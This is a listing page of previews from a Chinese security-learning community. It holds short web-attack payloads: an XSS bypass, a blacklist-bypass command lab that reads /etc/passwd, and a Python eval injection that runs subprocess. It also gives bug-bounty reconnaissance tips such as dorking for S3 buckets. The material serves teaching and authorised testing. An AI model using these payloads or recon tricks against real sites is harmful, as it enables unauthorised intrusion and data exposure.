星球内容沉淀


  • 简介
  • 目录大纲
  • 最新文档

    113 xss 绕过括号和反引号检测

    payload ``` onerror=alert;throw document.domain;

    myh0st - 2024年3月14日 15:57


    409 绕过多个黑名单命令

    ``` code POST argument. Find a way to execute cat /etc/passwd bypassing input validation.\n"; echo "Example: curl -d 'code=id' http://".$_SERVER["HTTP_HOST"]."/index.php \n\n"; error_reporting……

    myh0st - 2022年9月22日 16:38


    漏洞赏金自动化

    针对大量网站的测试实战经验记录 利用第三方平台收集目标相关 URL: https://github.com/bp0lr/gauplus 补天漏洞收录要求: 爱站网查询,百度 移动或者 PC 权重 >= 1,谷歌权重 >= 3 全部 gov.cn 和 edu.cn 后缀的网站 phpinfo泄露,反射xss,url重定向这类漏洞 不收 360 亿万守护计划收录要求: 爱站网查……

    myh0st - 2022年8月26日 17:41


    漏洞赏金秘密提示

    1、使用谷歌后门语法搜索 http://amazonaws.com 来寻找 S3 存储桶 2、通过谷歌语法:site:xazlsec.com filetype:pdf 来发现内部文档 3、发现子域接管漏洞,可以利用绕过 CSP 策略 4、子域名发现时,可以尝试枚举三级域名,比如 xxx.corp.xazlsec.com\xxx.dev.xazlsec.com 5、关注一些未授权的数据库,比如 9……

    myh0st - 2022年8月22日 09:31


    408 python eval 注入

    ?param=__import__("subprocess").getoutput("id") ==> "uid=0(root) gid=0(root)"

    myh0st - 2022年8月8日 00:14


    06 列目录问题发现

    这个漏洞主要是因为运维人员配置存在问题,导致目录可以列出来,如图 如何寻找这类问题? 当你使用爬虫爬取到大量 url 时,可以提取出这些 url 中的一个目录,比如 data、public 这种常见目录,也可以尝试枚举发现隐藏目录,有了这个目录列表之后 编写一个 xray 的 poc ,如图 (v2 版) https://docs.xray.cool/#/guide/poc ``` name: ……

    myh0st - 2022年6月28日 10:09


    第三方平台源码泄露

    比如 github 这些代码共享平台,泄露企业内部敏感信息,比如内部域名、IP、数据库连接信息等

    myh0st - 2022年6月20日 16:06


    配置错误信息泄露

    某些网站配置存在问题,导致目录可以列出,从而泄露敏感文件和路径

    myh0st - 2022年6月20日 15:35


    web页面信息泄露

    当 Web 应用程序未能充分保护敏感信息时,就会发生信息泄露,从而导致敏感的用户信息或数据或与其相关的任何内容泄露给第三方。 这些类型的问题在大多数情况下无法被利用,但它们被认为是 Web 应用程序安全问题,因为它们允许攻击者收集相关信息,这些信息可以在以后用于进一步影响攻击。 不同类型的信息披露 横幅抓取 横幅抓取是一个收集信息的过程,例如操作系统、服务器详细信息、正在运行的服务名称及其版……

    myh0st - 2022年6月20日 15:34


    API信息泄露

    无需认证的情况下访问 API,获得用户相关信息

    myh0st - 2022年6月20日 15:31



    myh0st